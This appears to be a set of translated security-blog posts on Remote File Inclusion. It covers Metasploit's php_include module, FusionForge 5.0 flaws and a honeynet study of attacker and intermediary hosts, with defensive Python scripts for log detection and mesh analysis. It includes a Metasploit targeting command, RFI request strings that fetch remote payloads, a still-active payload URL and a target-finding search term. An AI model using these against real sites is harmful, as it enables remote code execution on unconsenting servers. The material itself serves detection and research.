Playing with Remote File Inclusion in Metasploit

Exploiting Remote File Inclusion (RFI) through Metasploit is child's play. On 29 January 2010, RSnake released a database of more than 2000 URLs vulnerable to Remote File Inclusion. This RFI database was compiled mainly from Milw0rm and OSVDB, and on 15 February 2010 HD Moore integrated it into Metasploit so that it could be used by the already existing "php_include" exploit.

All the URLs in the database end with the "XXpathXX" marker, which is where the desired payload, for example "reverse_php", is injected.

If you don't specify a specific RFI target, the RFI database is used by default. To focus on a single URL, set PHPURI to the desired URL and end it with "XXpathXX". For example:

set PHPURI /index.php?COLOR=XXpathXX

When you check the HTTP server log you will see the related RFI attempts, but there is no way to distinguish an RFI bot scan from a Metasploit scan: by default Metasploit does not set a specific user agent for the "php_include" exploit. You can configure one in the exploit's advanced options (show advanced). Setting a specific user agent is useful for writing IDS rules that identify the tool that generated these attempts, during a QA run for example.
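As an added example (not code from the original post), here is a small Python detector run over constructed Apache combined-format log lines: it flags requests whose query parameters point at a remote URL, extracts the host serving the payload, and separates hits carrying an assumed custom QA user agent (ACME-QA-RFI-Scan/1.0, the kind of value you would set in the exploit's advanced options) from everything else.

```python
"""Flag Remote File Inclusion attempts in Apache combined-format access logs
and tell an authorised QA scan (recognisable by its custom User-Agent) apart
from everything else. Added example; log lines and the QA user agent are
constructed for illustration."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format: client, identd, user, [time], "request",
# status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that starts with a URL scheme is the RFI signature:
# the included file is fetched from another host.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Assumed value set in php_include's advanced options (not a Metasploit default).
QA_USER_AGENT = "ACME-QA-RFI-Scan/1.0"

# Constructed sample (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2010:10:12:01 +0100] "GET /index.php?COLOR=http://198.51.100.7/letter/id.txt? HTTP/1.1" 200 4321 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '192.0.2.77 - - [20/Feb/2010:10:13:45 +0100] "GET /index.php?COLOR=http://203.0.113.5/p.php HTTP/1.1" 200 4321 "-" "ACME-QA-RFI-Scan/1.0"',
    '192.0.2.20 - - [20/Feb/2010:10:14:02 +0100] "GET /index.php?COLOR=blue HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '192.0.2.31 - - [20/Feb/2010:10:15:09 +0100] "GET /common/include/pre.php?gfcommon=https://198.51.100.7/letter/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.8"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_includes(uri):
    """Return (parameter, payload host) pairs whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, urlsplit(value).hostname or ""))
    return hits


def analyse(lines):
    """One finding per tainted parameter: who sent it, which script and
    parameter were hit, where the payload lives, and whether it is our scan."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, host in remote_includes(rec["uri"]):
            findings.append({
                "src": rec["src"],
                "script": urlsplit(rec["uri"]).path,
                "param": param,
                "payload_host": host,
                "status": int(rec["status"]),
                "qa_scan": rec["ua"] == QA_USER_AGENT,
            })
    return findings


def intermediaries(findings):
    """Payload hosts seen in non-QA traffic, with the sources that used them.
    Each host is a candidate compromised 'intermediary' worth reporting."""
    hosts = {}
    for f in findings:
        if not f["qa_scan"]:
            hosts.setdefault(f["payload_host"], set()).add(f["src"])
    return {h: sorted(s) for h, s in hosts.items()}


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        tag = "QA scan" if f["qa_scan"] else "UNKNOWN"
        print(f"{tag:8} {f['src']} -> {f['script']}?{f['param']}= "
              f"payload on {f['payload_host']} (HTTP {f['status']})")
    print("intermediaries:", intermediaries(analyse(SAMPLE_LOG)))
```

A 404 on the target script (last sample line) still counts as an attempt: the scanner does not know which paths exist, so the log entry is the only trace of the probe.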

The RFI database integrated into Metasploit is currently 3 months old and no longer reflects the existing exploits, but you can create your own database and use it instead.

Google Documents participate in Remote File Inclusion networks propagation

Our honeynet has reported that a Remote File Inclusion (RFI) script is currently hosted on Google Documents and is taking part in the propagation of RFI networks.

This document, "shfx1", has been hosted by the Google user Markantil since 18/11/2009.

Google Documents hosting Remote File Inclusion scripts

Multiple RFI vulnerabilities in FusionForge 5.0

cr4wl3r has reported multiple Remote File Inclusion (RFI) vulnerabilities in FusionForge 5.0 that could allow a malicious user to compromise a vulnerable system.

The list of vulnerable pages is very long and the number of affected parameters is also considerable. These flaws could allow remote code to be included and executed in the context of the web server hosting the FusionForge 5.0 application.

The vulnerabilities were reported for version 5.0, but other versions may also be affected.

A great many websites use this application, both internationally and in France alone. Various government bodies use it, and it is certain that they will soon be targeted by RFI scanners and exploitation attempts. A simple Google query for the term "Powered by FusionForge" shows the enormous number of websites running it.


Example of a simple RFI network mesh

In a previous post I covered a study of an RFI and the principle of attacks through an intermediary. That study was limited to an attack involving just three IP addresses (the attacker's, the target's and the intermediary's).

What is more interesting is to try to model the RFI networks in place and how they are meshed together. This post deals with a simple example of an RFI mesh.

82.194.87.219, located in Bilbao, Spain, acting as the attacker, attempts to include on the target ZATAZ, located in France, a payload hosted on the intermediary 195.114.18.99 (aka www.laubrotel.com), also located in France.

Events originating from 82.194.87.219 related to the payload hosted on the intermediary 195.114.18.99 during the last month.

82.194.87.219, the attacker, was first seen on 2009-04-22 at 06:07:02 and last seen on 2009-06-27 at 01:03:33, and generated a total of 520 events. It is in fact a shared hosting server (see the sites referenced on this IP address) that has itself most likely been compromised for more than 2 months.

195.114.18.99, the intermediary, was first seen on 2009-02-20 at 21:51:43 and last seen on 2009-06-27 at 01:03:33, and was involved in close to 559 events. The payload, still active (http://www.laubrotel.com/letter/id?), is the result of an update that was never applied to a Joomla installation. This website has now been compromised for more than 4 months.

We can therefore see that the intermediary, aka 195.114.18.99, has a much longer lifetime than the attacker, which implies that the payload had previously been used by other attackers.

Below, after a little scripting and a little analysis, you will find all the attackers that have been in contact with the intermediary 195.114.18.99.

This gives the following Google Maps representation of the intermediary's entire life cycle.

Here we can see that this intermediary has been used by different attackers who are most likely linked to the same network.
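As an added example (not the post's own tooling), the following Python models the mesh described above from constructed honeypot events (RFC 5737 documentation addresses, not the real hosts): it computes each node's first/last seen and event count, compares the intermediary's lifetime with the attacker's, and lists the attackers that share an intermediary, which is the one-hop mesh drawn on the map.

```python
"""Model a Remote File Inclusion 'mesh' from honeypot events: which attacking
hosts pulled a payload from which intermediary host, when each node was first
and last seen, and which attackers share an intermediary. Added example with
constructed data."""
from collections import defaultdict
from datetime import datetime

# Constructed events (RFC 5737 addresses). Each tuple:
# (timestamp, attacker IP, intermediary host serving the payload, payload path).
EVENTS = [
    ("2009-02-20 21:51:43", "203.0.113.9", "198.51.100.7", "/letter/id.txt"),
    ("2009-03-02 03:14:10", "203.0.113.9", "198.51.100.7", "/letter/id.txt"),
    ("2009-04-22 06:07:02", "192.0.2.44", "198.51.100.7", "/letter/id.txt"),
    ("2009-05-15 12:00:00", "192.0.2.44", "198.51.100.7", "/letter/id.txt"),
    ("2009-06-01 08:30:00", "192.0.2.80", "198.51.100.7", "/letter/id.txt"),
    ("2009-06-27 01:03:33", "192.0.2.44", "198.51.100.7", "/letter/id.txt"),
    ("2009-06-10 09:00:00", "192.0.2.80", "203.0.113.200", "/img/logo.gif"),
]
FMT = "%Y-%m-%d %H:%M:%S"


def node_stats(events):
    """first/last seen and event count for every attacker and intermediary,
    keyed by (role, host)."""
    stats = {}
    for ts, attacker, inter, _ in events:
        t = datetime.strptime(ts, FMT)
        for role, node in (("attacker", attacker), ("intermediary", inter)):
            s = stats.setdefault((role, node), {"first": t, "last": t, "events": 0})
            s["first"] = min(s["first"], t)
            s["last"] = max(s["last"], t)
            s["events"] += 1
    return stats


def lifetime_days(stats, role, node):
    """Whole days between first and last sighting of a node."""
    s = stats[(role, node)]
    return (s["last"] - s["first"]).days


def mesh(events):
    """intermediary -> {attacker -> number of events that used it}."""
    m = defaultdict(lambda: defaultdict(int))
    for _, attacker, inter, _ in events:
        m[inter][attacker] += 1
    return {inter: dict(attackers) for inter, attackers in m.items()}


def shared_intermediaries(events):
    """Intermediaries used by more than one attacker: a payload host that
    outlives any single attacker and is reused across the network."""
    return sorted(i for i, a in mesh(events).items() if len(a) > 1)


def linked_attackers(events, attacker):
    """Other attackers that pulled a payload from an intermediary this
    attacker also used (one hop in the mesh)."""
    linked = set()
    for attackers in mesh(events).values():
        if attacker in attackers:
            linked.update(attackers)
    linked.discard(attacker)
    return sorted(linked)


if __name__ == "__main__":
    stats = node_stats(EVENTS)
    for (role, node), s in sorted(stats.items()):
        print(f"{role:12} {node:14} first {s['first']} last {s['last']} "
              f"events {s['events']} lifetime {lifetime_days(stats, role, node)}d")
    print("shared intermediaries:", shared_intermediaries(EVENTS))
    print("linked to 192.0.2.44:", linked_attackers(EVENTS, "192.0.2.44"))
```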

The next post will cover a more complex study of RFI network meshing.